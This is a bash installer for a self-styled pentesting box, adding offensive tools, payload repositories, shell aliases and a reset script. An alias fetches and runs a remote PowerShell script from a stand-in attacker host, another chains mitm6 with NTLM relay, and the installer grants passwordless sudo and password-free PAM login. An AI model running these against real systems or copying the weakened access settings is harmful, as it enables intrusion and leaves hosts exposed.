# Dear user - Please consider this, just because you can, doesn't mean you should.
# Please dont be an asshole with this. ask permission. stay out of jail. be responsable.
# This script is 100% free to modify and distrubute as you see fit, but you are not
# allowed to charge for it. the tools are free and thus so should be this script.

#!/bin/bash
set -e
# ============================================
# RUCKRAT CTFBOX v3.4 — FULL INSTALLER
# Debian + Zsh + p10k + Field-Ready
# "Mine. Not Kali. Not Parrot. MINE."
# ============================================

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'

# Logging
log_info() { echo -e "${GREEN}[+]${NC} $1"; }
log_warn() { echo -e "${YELLOW}[!]${NC} $1"; }
log_error() { echo -e "${RED}[-]${NC} $1"; }
log_progress() { echo -e "${BLUE}[*]${NC} $1"; }

# Capture original user
ORIGINAL_USER="${SUDO_USER:-$USER}"
[[ "$ORIGINAL_USER" == "root" ]] && ORIGINAL_USER=""

# Username validation
validate_username() {
  local username="$1"
  if [[ ! "$username" =~ ^[a-z_][a-z0-9_-]{0,31}$ ]]; then
    log_error "Invalid username format"
    return 1
  fi
  local reserved=("root" "daemon" "bin" "sys" "sync" "games" "man" "lp" "mail" "news" "uucp" "proxy" "www-data" "backup" "list" "irc" "nobody")
  for reserved_name in "${reserved[@]}"; do
    [[ "$username" == "$reserved_name" ]] && log_error "Cannot use reserved username: $username" && return 1
  done
  return 0
}

# Welcome
clear
echo -e "${CYAN}"
cat << 'EOF'
╔═══════════════════════════════════════════════════════════════╗
║     ██████╗████████╗███████╗    ██████╗  ██████╗ ██╗  ██╗     ║
║    ██╔════╝╚══██╔══╝██╔════╝    ██╔══██╗██╔═══██╗╚██╗██╔╝     ║
║    ██║         ██║  █████╗      ██████╔╝██║   ██║ ╚███╔╝      ║
║    ██║         ██║  ██╔══╝      ██╔══██╗██║   ██║ ██╔██╗      ║
║    ╚██████╗    ██║  ██║         ██████╔╝╚██████╔╝██╔╝ ██╗     ║
║     ╚═════╝    ╚═╝  ╚═╝         ╚═════╝  ╚═════╝ ╚═╝  ╚═╝     ║
║                                                               ║
║            PENTESTING TOOLKIT INSTALLER                       ║
║            A love letter to Pentesting by Jamie Loring        ║
╚═══════════════════════════════════════════════════════════════╝
EOF
echo -e "${NC}\n"

DEFAULT_USERNAME="$USER"
while true; do
  read -p "Enter pentesting username [default: $DEFAULT_USERNAME]: " USERNAME
  USERNAME="${USERNAME:-$DEFAULT_USERNAME}"
  validate_username "$USERNAME" && break
done
export USERNAME
export USER_HOME="/home/$USERNAME"
log_info "Username: ${GREEN}$USERNAME${NC}"
echo ""
log_warn "This will install EVERYTHING (takes 10-30 minutes)"
read -p "Continue? (y/n): " confirm
[[ "$confirm" != "y" ]] && [[ "$confirm" != "Y" ]] && exit 0

# ============================================
# PHASE 1: SYSTEM SETUP
# ============================================
log_progress "Phase 1: System Updates & Base Packages"
export DEBIAN_FRONTEND=noninteractive
export NEEDRESTART_MODE=a
export NEEDRESTART_SUSPEND=1
echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections
mkdir -p /etc/needrestart/conf.d
cat > /etc/needrestart/conf.d/no-prompt.conf << 'EOF'
$nrconf{restart} = 'a';
$nrconf{kernelhints} = 0;
EOF

DEBIAN_FRONTEND=noninteractive apt update -qq
DEBIAN_FRONTEND=noninteractive apt upgrade -y -qq
DEBIAN_FRONTEND=noninteractive apt install -y -qq \
  build-essential git curl wget vim neovim tmux zsh \
  python3-pip python3-venv golang-go rustc cargo \
  docker.io docker-compose jq ripgrep fd-find bat \
  htop ncdu tree fonts-powerline silversearcher-ag \
  perl timeout \
  john john-data hashcat sqlmap \
  mingw-w64 mingw-w64-tools \
  2>&1 | tee -a /var/log/ctfbox-install.log

# ============================================
# PHASE 2: USER SETUP
# ============================================
log_progress "Phase 2: User Account Configuration"
if ! id "$USERNAME" &>/dev/null; then
  useradd -m -s /bin/zsh -G sudo,docker "$USERNAME"
  echo "$USERNAME:''" | chpasswd -e
  log_info "User '$USERNAME' created"
else
  log_info "User '$USERNAME' already exists"
fi
echo "$USERNAME ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/"$USERNAME"
chmod 440 /etc/sudoers.d/"$USERNAME"
chown -R "$USERNAME":"$USERNAME" "$USER_HOME" 2>/dev/null || true
chsh -s "$(which zsh)" "$USERNAME" 2>/dev/null || true

# Auto-login
echo ""
read -p "Enable auto-login for $USERNAME and disable $ORIGINAL_USER? (y/n): " auto_login
if [[ "$auto_login" =~ ^[Yy]$ ]]; then
  log_progress "Configuring auto-login..."
  if [[ -d "/etc/lightdm" ]]; then
    mkdir -p /etc/lightdm/lightdm.conf.d
    cat > /etc/lightdm/lightdm.conf.d/50-autologin.conf << EOF
[Seat:*]
autologin-user=$USERNAME
autologin-user-timeout=0
allow-guest=false
EOF
  fi
  if [[ -f "/etc/gdm3/custom.conf" ]]; then
    sed -i '/AutomaticLoginEnable/d' /etc/gdm3/custom.conf
    sed -i '/AutomaticLogin/d' /etc/gdm3/custom.conf
    sed -i '/^\[daemon\]/a AutomaticLoginEnable = true' /etc/gdm3/custom.conf
    sed -i "/^AutomaticLoginEnable/a AutomaticLogin = $USERNAME" /etc/gdm3/custom.conf
  fi
  if [[ -f "/etc/sddm.conf" ]] || [[ -d "/etc/sddm.conf.d" ]]; then
    mkdir -p /etc/sddm.conf.d
    cat > /etc/sddm.conf.d/autologin.conf << EOF
[Autologin]
User=$USERNAME
Session=plasma.desktop
EOF
  fi
fi

# Passwordless login group
if ! grep -q '^nopasswdlogin:' /etc/group; then
  groupadd nopasswdlogin
fi
usermod -aG nopasswdlogin "$USERNAME"
if ! grep -q 'pam_succeed_if.so user ingroup nopasswdlogin' /etc/pam.d/common-auth; then
  sed -i '/^auth.*pam_deny.so/i auth\t[success=1 default=ignore]\tpam_succeed_if.so user ingroup nopasswdlogin' /etc/pam.d/common-auth
fi

# ============================================
# PHASE 3: SHELL ENVIRONMENT
# ============================================
log_progress "Phase 3: Shell Environment (Zsh + Oh-My-Zsh + p10k)"
TEMP_HOME="/tmp/user-setup-$USERNAME"
rm -rf "$TEMP_HOME" 2>/dev/null || true
mkdir -p "$TEMP_HOME"
export HOME="$TEMP_HOME"
sh -c "RUNZSH=no $(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" "" --unattended 2>&1 | tee -a /var/log/ctfbox-install.log
export HOME="/root"
git clone https://github.com/zsh-users/zsh-autosuggestions "${TEMP_HOME}/.oh-my-zsh/custom/plugins/zsh-autosuggestions" 2>/dev/null || true
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git "${TEMP_HOME}/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting" 2>/dev/null || true
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git "${TEMP_HOME}/.oh-my-zsh/custom/themes/powerlevel10k" 2>/dev/null || true
wget -q https://raw.githubusercontent.com/Jamie-loring/Public-scripts/main/p10k-jamie-config.zsh -O "${TEMP_HOME}/.p10k.zsh" 2>/dev/null || log_warn "Failed to download p10k config"
cp -r "$TEMP_HOME"/.oh-my-zsh "$USER_HOME/" 2>/dev/null || true
cp "$TEMP_HOME"/.p10k.zsh "$USER_HOME/" 2>/dev/null || true
chown -R "$USERNAME":"$USERNAME" "$USER_HOME/.oh-my-zsh" "$USER_HOME/.p10k.zsh" 2>/dev/null || true
rm -rf "$TEMP_HOME"

# ============================================
# PHASE 4: TOOLS INSTALLATION
# ============================================
log_progress "Phase 4: Installing Pentesting Tools"
mkdir -p "$USER_HOME"/tools/{wordlists,scripts,exploits,repos,windows}

# Python tools
log_progress "Installing Python tools..."
pip3 install --break-system-packages impacket 2>&1 | tee -a /var/log/ctfbox-install.log || pip3 install impacket
if ! command -v pipx &> /dev/null; then
  apt install -y pipx
  pipx ensurepath
  export PATH="$PATH:/root/.local/bin"
fi
pipx install git+https://github.com/Pennyw0rth/NetExec ldapdomaindump sprayhound RsaCtfTool 2>&1 | tee -a /var/log/ctfbox-install.log || log_warn "pipx install failed"
pip3 install --break-system-packages \
  hashid featherduster bloodhound bloodyAD mitm6 responder \
  certipy-ad coercer pypykatz lsassy enum4linux-ng dnsrecon \
  git-dumper roadrecon manspider mitmproxy pwntools ROPgadget \
  truffleHog 2>&1 | tee -a /var/log/ctfbox-install.log || true

# Go tools
if command -v go &> /dev/null; then
  log_progress "Installing Go tools..."
  export GOPATH="$USER_HOME/go"
  mkdir -p "$GOPATH/bin"
  bash -c "go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest && \
    go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && \
    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest && \
    go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest && \
    go install -v github.com/projectdiscovery/katana/cmd/katana@latest && \
    go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest && \
    go install -v github.com/ffuf/ffuf@latest && \
    go install -v github.com/OJ/gobuster/v3@latest && \
    go install -v github.com/ropnop/kerbrute@latest && \
    go install -v github.com/jpillora/chisel@latest && \
    go install -v github.com/epi052/feroxbuster@latest && \
    go install -v github.com/bp0lr/gauplus@latest && \
    go install -v github.com/ropnop/windapsearch@latest && \
    go install -v github.com/garrettfoster13/pre2k@latest && \
    go install -v github.com/nicocha30/ligolo-ng/cmd/proxy@latest && \
    go install -v github.com/nicocha30/ligolo-ng/cmd/agent@latest" \
    2>&1 | tee -a /var/log/ctfbox-install.log || true
fi

# Ruby tools
if command -v gem &> /dev/null; then
  log_progress "Installing Ruby tools..."
  gem install one_gadget haiti-hash evil-winrm 2>&1 | tee -a /var/log/ctfbox-install.log || true
fi

# Ysoserial
if [[ ! -f "$USER_HOME/tools/ysoserial.jar" ]] && command -v java &> /dev/null; then
  wget -q https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O "$USER_HOME/tools/ysoserial.jar" 2>/dev/null || log_warn "Failed to download ysoserial"
fi

# ============================================
# PHASE 4.5: RUNASCS + PRE-COMPILED WINDOWS BINARIES
# ============================================
log_progress "Phase 4.5: Compiling & Downloading runasCs + Win Binaries"
mkdir -p "$USER_HOME/tools/windows"

# Compile runasCs (x86_64)
if ! command -v x86_64-w64-mingw32-gcc &>/dev/null; then
  log_warn "MinGW not found. Skipping runasCs compile."
else
  wget -q https://raw.githubusercontent.com/antonioCoco/RunasCs/master/RunasCs.c -O /tmp/RunasCs.c
  x86_64-w64-mingw32-gcc /tmp/RunasCs.c -o "$USER_HOME/tools/windows/runasCs.exe" -lwininet -lws2_32 -static 2>/dev/null && log_info "runasCs.exe compiled"
  rm -f /tmp/RunasCs.c
fi

# Download pre-compiled Windows tools
log_progress "Downloading pre-compiled Windows binaries..."
wget -q https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1 -O "$USER_HOME/tools/windows/PowerView.ps1" 2>/dev/null || true
wget -q https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe -O "$USER_HOME/tools/windows/Rubeus.exe" 2>/dev/null || true
wget -q https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/SharpHound.exe -O "$USER_HOME/tools/windows/SharpHound.exe" 2>/dev/null || true
wget -q https://github.com/Flangvik/SharpCollection/raw/master/net48/Seatbelt.exe -O "$USER_HOME/tools/windows/Seatbelt.exe" 2>/dev/null || true
chown -R "$USERNAME":"$USERNAME" "$USER_HOME/tools/windows" 2>/dev/null || true

# ============================================
# PHASE 5: WORDLISTS
# ============================================
log_progress "Phase 5: Downloading Wordlists (~700MB)"
if [[ ! -d "$USER_HOME/tools/wordlists/SecLists" ]]; then
  git clone --depth 1 https://github.com/danielmiessler/SecLists.git "$USER_HOME/tools/wordlists/SecLists" 2>&1 | tee -a /var/log/ctfbox-install.log || log_warn "SecLists clone failed"
fi
if [[ -f "/usr/share/wordlists/rockyou.txt.gz" ]] && [[ ! -f "/usr/share/wordlists/rockyou.txt" ]]; then
  gunzip /usr/share/wordlists/rockyou.txt.gz
fi
ln -sf "$USER_HOME/tools/wordlists/SecLists" "$USER_HOME/SecLists" 2>/dev/null || true
ln -sf /usr/share/wordlists/rockyou.txt "$USER_HOME/tools/wordlists/rockyou.txt" 2>/dev/null || true

# ============================================
# PHASE 6: REPOSITORIES
# ============================================
log_progress "Phase 6: Cloning Essential Repositories"
clone_repo() {
  local url="$1"
  local name=$(basename "$url" .git)
  if [[ ! -d "$USER_HOME/tools/repos/$name" ]]; then
    git clone "$url" "$USER_HOME/tools/repos/$name" 2>&1 | tee -a /var/log/ctfbox-install.log || log_warn "Failed to clone $name"
  fi
}
clone_repo "https://github.com/swisskyrepo/PayloadsAllTheThings.git"
clone_repo "https://github.com/peass-ng/PEASS-ng.git"
clone_repo "https://github.com/HackTricks-wiki/HackTricks.git"
clone_repo "https://github.com/Tib3rius/AutoRecon.git"
clone_repo "https://github.com/fortra/impacket.git"
clone_repo "https://github.com/projectdiscovery/nuclei-templates.git"
clone_repo "https://github.com/internetwache/GitTools.git"
clone_repo "https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git"
clone_repo "https://github.com/PowerShellMafia/PowerSploit.git"
clone_repo "https://github.com/GTFOBins/GTFOBins.github.io.git"
clone_repo "https://github.com/LOLBAS-Project/LOLBAS.git"
clone_repo "https://github.com/RsaCtfTool/RsaCtfTool.git"
clone_repo "https://github.com/brightio/penelope.git"

ln -sf "$USER_HOME/tools/repos/PEASS-ng/linPEAS/linpeas.sh" "$USER_HOME/linpeas.sh" 2>/dev/null || true
ln -sf "$USER_HOME/tools/repos/PEASS-ng/winPEAS/winPEASx64.exe" "$USER_HOME/winpeas.exe" 2>/dev/null || true
ln -sf "$USER_HOME/tools/repos/penelope/penelope.py" "$USER_HOME/penelope.py" 2>/dev/null || true

# ============================================
# PHASE 7: DOTFILES & SCRIPTS
# ============================================
log_progress "Phase 7: Creating Dotfiles & Scripts"
mkdir -p "$USER_HOME/scripts" "$USER_HOME/Desktop"

# .zshrc
cat > "$USER_HOME/.zshrc" << 'ZSH_EOF'
export ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="powerlevel10k/powerlevel10k"
plugins=(git zsh-autosuggestions zsh-syntax-highlighting docker sudo history command-not-found)
source $ZSH/oh-my-zsh.sh
[[ -f ~/.p10k.zsh ]] && source ~/.p10k.zsh
export PATH=$PATH:$HOME/go/bin:$HOME/.local/bin
export EDITOR=vim
export GOPATH=$HOME/go
(nuclei -update-templates -silent &>/dev/null &)

# System aliases
alias ll='ls -lah'
alias ...='cd ../..'
alias c='clear'
alias h='history'
alias please='sudo'
alias rl='rlwrap nc'

# Pentesting aliases
alias nmap-quick='nmap -sV -sC -O'
alias nmap-full='nmap -sV -sC -O -p-'
alias nmap-udp='nmap -sU -sV'
alias serve='python3 -m http.server'
alias serve80='sudo python3 -m http.server 80'
alias myip='curl -s ifconfig.me && echo'
alias ports='netstat -tulanp'
alias listening='lsof -i -P -n | grep LISTEN'
alias hash='hashid'
alias shell='python3 ~/penelope.py'

# Cracking
alias john='john --wordlist=~/tools/wordlists/rockyou.txt'
alias hashcat='hashcat -m 1000'  # NTLM default
alias sql='sqlmap'

# Tool shortcuts
alias nxc='netexec'
alias cme='netexec'
alias smb='netexec smb'
alias winrm='netexec winrm'
alias bloodhound='bloodhound-python'
alias peas='linpeas.sh'
alias ysoserial='java -jar ~/tools/ysoserial.jar'
alias evil='evil-winrm'
alias ldump='ldapdomaindump'
alias runas='wine ~/tools/windows/runasCs.exe'

# Windows Tools
alias powerview='powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://$ATTACKER/PowerView.ps1'')"'
alias rubeus='~/tools/windows/Rubeus.exe'
alias sharphound='~/tools/windows/SharpHound.exe'
alias seatbelt='~/tools/windows/Seatbelt.exe'

# Impacket shortcuts
alias secretsdump='secretsdump.py'
alias getnpusers='GetNPUsers.py'
alias getuserspns='GetUserSPNs.py'
alias psexec='psexec.py'
alias smbexec='smbexec.py'
alias wmiexec='wmiexec.py'
alias ntlmrelayx='ntlmrelayx.py'

# Wordlist shortcuts
alias wl-common='~/tools/wordlists/SecLists/Discovery/Web-Content/common.txt'
alias wl-dir='~/tools/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt'
alias wl-users='~/tools/wordlists/SecLists/Usernames/Names/names.txt'
alias wl-pass='~/tools/wordlists/rockyou.txt'
alias wl-params='~/tools/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt'

# Chisel shortcuts
alias chisel-server='chisel server --reverse --port 8000'
alias chisel-client='chisel client'

# Combo attacks
alias mitm-relay='sudo mitm6 -d DOMAIN & ntlmrelayx.py -t ldaps://DC-IP -wh attacker-ip --delegate-access'

# Navigation
alias tools='cd ~/tools'
alias repos='cd ~/tools/repos'
alias wordlists='cd ~/tools/wordlists'
alias scripts='cd ~/tools/scripts'
alias engagements='cd ~/engagements'
alias win='cd ~/tools/windows'

# Functions
newengagement() {
  [[ -z "$1" ]] && echo "Usage: newengagement <name>" && return 1
  mkdir -p ~/engagements/$1/{recon,scans,exploits,loot,notes,screenshots}
  cd ~/engagements/$1
  echo "# $1 Engagement" > notes/README.md
  echo "Created: $1"
  ls -la
}
quickscan() {
  [[ -z "$1" ]] && echo "Usage: quickscan <target>" && return 1
  nmap -sV -sC -O -oA quickscan_$(date +%Y%m%d_%H%M%S) $1
}
extract() {
  if [[ -f $1 ]]; then
    case $1 in
      *.tar.bz2) tar xjf $1 ;;
      *.tar.gz) tar xzf $1 ;;
      *.bz2) bunzip2 $1 ;;
      *.rar) unrar e $1 ;;
      *.gz) gunzip $1 ;;
      *.tar) tar xf $1 ;;
      *.tbz2) tar xjf $1 ;;
      *.tgz) tar xzf $1 ;;
      *.zip) unzip $1 ;;
      *.Z) uncompress $1 ;;
      *.7z) 7z x $1 ;;
      *) echo "'$1' cannot be extracted" ;;
    esac
  else
    echo "'$1' is not a valid file"
  fi
}
ZSH_EOF

# update-tools.sh
cat > "$USER_HOME/scripts/update-tools.sh" << 'UPDATE_EOF'
#!/bin/bash
echo "[+] Updating system..."
sudo apt update && sudo apt upgrade -y
echo "[+] Updating Python tools..."
pip3 install --upgrade --break-system-packages impacket bloodhound bloodyAD certipy-ad pypykatz lsassy pwntools ROPgadget truffleHog || true
echo "[+] Updating Go tools..."
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/ffuf/ffuf@latest
go install -v github.com/OJ/gobuster/v3@latest
go install -v github.com/jpillora/chisel@latest
go install -v github.com/epi052/feroxbuster@latest
go install -v github.com/bp0lr/gauplus@latest
go install -v github.com/ropnop/windapsearch@latest
go install -v github.com/garrettfoster13/pre2k@latest
go install -v github.com/nicocha30/ligolo-ng/cmd/proxy@latest
go install -v github.com/nicocha30/ligolo-ng/cmd/agent@latest
echo "[+] Updating nuclei templates..."
nuclei -update-templates
echo "[+] Updating Ruby tools..."
gem update one_gadget haiti-hash evil-winrm || true
echo "[+] Updating pipx tools..."
pipx upgrade-all || true
echo "[+] Updating repositories..."
cd ~/tools/repos
for dir in */; do
  echo "[*] Updating $dir"
  cd "$dir" && git pull && cd ..
done
echo "[+] Done!"
UPDATE_EOF
chmod +x "$USER_HOME/scripts/update-tools.sh"

# ============================================
# PHASE 8: RESET SCRIPT (v3.3)
# ============================================
log_progress "Phase 8: Installing RESET_CTF_BOX.sh v3.3"
cat > "$USER_HOME/Desktop/RESET_CTF_BOX.sh" << 'RESET_EOF'
#!/bin/bash
set -euo pipefail

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

echo -e "${CYAN}RUCKRAT RESET v3.3 — DEBIAN ZSH EDITION${NC}\n"
echo -e "${YELLOW}Captures:${NC} Zsh history + ALL live PTY buffers"
echo -e "${YELLOW}Wipes:${NC} Creds, hosts, Kerberos, SSH"
echo ""
read -p "Continue? (yes/no): " confirm
[[ "$confirm" != "yes" ]] && exit 0

ARCHIVE_DIR="$HOME/archives/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$ARCHIVE_DIR/history"

log() { echo -e "${GREEN}[+]${NC} $1"; }

# 1. CAPTURE ZSH HISTORY
log "Saving Zsh command history..."
[[ -f "$HOME/.zsh_history" ]] && cp "$HOME/.zsh_history" "$ARCHIVE_DIR/history/zsh_history.txt"
if [[ -f "$ARCHIVE_DIR/history/zsh_history.txt" ]]; then
  perl -pe 's/^: \d+:\d+;//' "$HOME/.zsh_history" > "$ARCHIVE_DIR/history/zsh_clean.txt" 2>/dev/null || true
  log "Zsh history decoded"
fi

# 2. CAPTURE ALL LIVE PTY BUFFERS
log "Dumping all active terminal screens..."
pty_count=0
for pty in /dev/pts/[0-9]*; do
  [[ ! -e "$pty" ]] && continue
  owner=$(stat -c %U "$pty" 2>/dev/null || echo "")
  [[ "$owner" != "$USER" ]] && continue
  pty_name=$(basename "$pty")
  timeout 2 script -q -c "cat" /dev/null > "$ARCHIVE_DIR/history/pty_${pty_name}.txt" 2>/dev/null || true
  ((pty_count++))
done
[[ $pty_count -gt 0 ]] && log "Captured $pty_count live terminal buffers"

# 3. ARCHIVE ENGAGEMENTS
if [[ -d "$HOME/engagements" ]] && ls -A "$HOME/engagements" &>/dev/null; then
  tar -czf "$ARCHIVE_DIR/engagements_backup.tar.gz" -C "$HOME" engagements
  rm -rf "$HOME/engagements"/*
  log "Engagements archived"
fi

# 4. SYSTEM WIPE
sudo cp /etc/hosts "$ARCHIVE_DIR/hosts.backup" 2>/dev/null
sudo bash -c "cat > /etc/hosts << 'EOF'
127.0.0.1 localhost
127.0.1.1 $(hostname)
::1 localhost ip6-localhost ip6-loopback
EOF"
log "/etc/hosts reset"

kdestroy -A 2>/dev/null || true
rm -f /tmp/krb5cc_* 2>/dev/null || true
log "Kerberos cleared"

: > "$HOME/.zsh_history" 2>/dev/null
history -c 2>/dev/null || true
log "Zsh history cleared"

rm -rf "$HOME/.responder"/* "$HOME/.nxc"/* "$HOME/.cme"/* 2>/dev/null || true
log "Cached credentials cleared"

: > "$HOME/.ssh/known_hosts" 2>/dev/null || true
log "SSH known hosts cleared"

echo -e "\n${GREEN}RESET COMPLETE${NC}"
echo -e "Archive: ${CYAN}$ARCHIVE_DIR${NC}"
echo -e "History: ${CYAN}~/archives/$(basename $ARCHIVE_DIR)/history/${NC}\n"

if [[ $pty_count -gt 0 ]]; then
  echo -e "${YELLOW}Live terminal preview (last 10 lines):${NC}"
  tail -n 10 "$ARCHIVE_DIR/history"/pty_*.txt 2>/dev/null | tail -n 10 || echo "(empty)"
  echo
fi

read -p "Reboot now? (y/n): " reboot_choice
[[ "$reboot_choice" =~ ^[Yy]$ ]] && sudo reboot
RESET_EOF
chmod +x "$USER_HOME/Desktop/RESET_CTF_BOX.sh"

# ============================================
# PHASE 9: DOCUMENTATION
# ============================================
log_progress "Phase 9: Creating Desktop Documentation"
cat > "$USER_HOME/Desktop/COMMANDS.txt" << 'DOC_EOF'
RUCKRAT CTFBOX v3.4 — QUICK COMMANDS
-----------------------------------------
newengagement <n> → Create engagement
quickscan <ip> → Nmap quick
extract <file> → Universal unpack
reset → ~/Desktop/RESET_CTF_BOX.sh
update → ~/scripts/update-tools.sh

john → crack with rockyou
hashcat → GPU NTLM cracking
sql → sqlmap -u URL
runas → wine ~/tools/windows/runasCs.exe
win → cd ~/tools/windows

mitm-relay → mitm6 + ntlmrelayx combo
evil → evil-winrm -i target
wl-dir → directory-list-2.3-medium.txt
DOC_EOF

cat > "$USER_HOME/Desktop/TOOL_LOCATIONS.txt" << 'LOC_EOF'
RUCKRAT CTFBOX v3.4 — TOOL MAP
-----------------------------------------
USER: $USERNAME
HOME: $USER_HOME
GOPATH: $USER_HOME/go

Go Tools: ~/go/bin/
Python: pipx + global
Ruby: evil-winrm, one_gadget
Windows: ~/tools/windows/

Key Files:
  ~/.zshrc
  ~/scripts/update-tools.sh
  ~/Desktop/RESET_CTF_BOX.sh
  ~/tools/windows/runasCs.exe
LOC_EOF

chown "$USERNAME":"$USERNAME" "$USER_HOME/Desktop"/*.txt 2>/dev/null || true

# ============================================
# PHASE 10: FINAL CLEANUP
# ============================================
log_progress "Phase 10: Final Cleanup"
chown -R "$USERNAME":"$USERNAME" "$USER_HOME" 2>/dev/null || true
apt autoremove -y -qq 2>/dev/null || true
apt clean -qq 2>/dev/null || true

# ============================================
# COMPLETION
# ============================================
clear
echo -e "${GREEN}"
cat << 'EOF'
╔═══════════════════════════════════════════════════════════════╗
║               RUCKRAT CTFBOX v3.4 — READY               ║
╚═══════════════════════════════════════════════════════════════╝
EOF
echo -e "${NC}\n"
echo -e "${YELLOW}User:${NC} ${GREEN}$USERNAME${NC}"
echo -e "${YELLOW}Home:${NC} ${GREEN}$USER_HOME${NC}"
echo -e "${CYAN}Cracking:${NC} john, hashcat"
echo -e "${CYAN}Web:${NC} sqlmap"
echo -e "${CYAN}Windows:${NC} runasCs.exe, Rubeus, SharpHound"
echo -e "${CYAN}Reset:${NC} ~/Desktop/RESET_CTF_BOX.sh"
echo ""
read -p "Reboot now? (y/n): " reboot_choice
if [[ "$reboot_choice" =~ ^[Yy]$ ]]; then
  echo -e "\n${YELLOW}Rebooting in 5 seconds...${NC}"
  sleep 5
  reboot
fi
echo -e "${GREEN}Happy Hacking! MINE. NOT KALI. NOT PARROT. MINE.${NC}\n"
